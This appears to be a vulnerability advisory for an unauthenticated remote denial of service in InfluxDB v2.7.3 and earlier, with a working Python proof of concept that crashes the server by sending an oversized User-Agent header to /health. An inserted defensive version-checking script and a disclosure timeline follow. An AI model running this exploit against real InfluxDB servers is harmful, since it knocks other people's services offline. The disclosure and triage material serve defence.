InfluxDB - Unauthenticated Remote DoS (CVE-XXXX-XXXX)
Description
InfluxDB is described as a "Scalable datastore for metrics, events, and real-time analytics". I was looking through InfluxDB and discovered an unauthenticated remote DoS that affects v2.7.3 and before. Here is the sample code to DoS any InfluxDB server; Shodan clocks in about ~28700 instances right now.
Proof of Concept
import requests
import time

URL = "http://localhost"
PORT = "8086"

# Send an oversized User-Agent header (~1 MB) to the /health endpoint
response = requests.get(
    URL + ":" + PORT + "/health",
    headers={"User-Agent": "A" * 1052334}
)

# Give the server time to go down before checking it again
time.sleep(15)
try:
    response2 = requests.get(
        URL + ":" + PORT + "/health",
    )
    if response2.status_code == 200:
        print("Didn't go down, probably a docker container.")
except requests.exceptions.RequestException as e:
    print("Looks like it was successful")
exit()
Diving deeper into this, the only condition that this exploit relies on is that the metrics scraper must be working properly. The way InfluxDB parses the HTTP request causes it to crash with a panic due to the size in the scraper.
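For triage, the practical question is which instances are still on v2.7.3 or earlier. The following check is an added example and is not part of the advisory; it compares the version reported by an instance against the fixed release, 2.7.4, from the disclosure timeline. It assumes (not stated on the page) that the 2.x /health endpoint returns a JSON object with a "version" key, and the helper names are my own.

```python
import json
import re
import urllib.request

# Remediation was pushed in v2.7.4 according to the disclosure timeline
FIXED_VERSION = (2, 7, 4)


def parse_version(version):
    """Turn '2.7.3' or 'v2.7.3' into an integer tuple so that 2.7.10 > 2.7.4."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version):
    """True for v2.7.3 and before, i.e. anything below the fixed release."""
    return parse_version(version) < FIXED_VERSION


def assess_health_body(body):
    """Classify a /health JSON body as 'affected', 'fixed' or 'unknown'.

    Assumption: the body is a JSON object that carries a 'version' key
    (hypothetical shape, not confirmed by the advisory).
    """
    doc = json.loads(body)
    version = doc.get("version")
    if version is None:
        return "unknown"
    return "affected" if is_affected(version) else "fixed"


def check_instance(base_url, timeout=5):
    """Fetch /health from an instance you operate and report its status."""
    url = base_url.rstrip("/") + "/health"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return assess_health_body(resp.read().decode())


if __name__ == "__main__":
    # Constructed sample body standing in for a live response
    sample = json.dumps({"name": "influxdb", "status": "pass", "version": "2.7.3"})
    print(assess_health_body(sample))  # affected
```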
Location
Disclosure
Nov 7, 2023 - Maintainers contacted
Nov 8, 2023 - Remediation pushed to v2.7.4
Nov 9, 2023 - Maintainers ACK'd security issue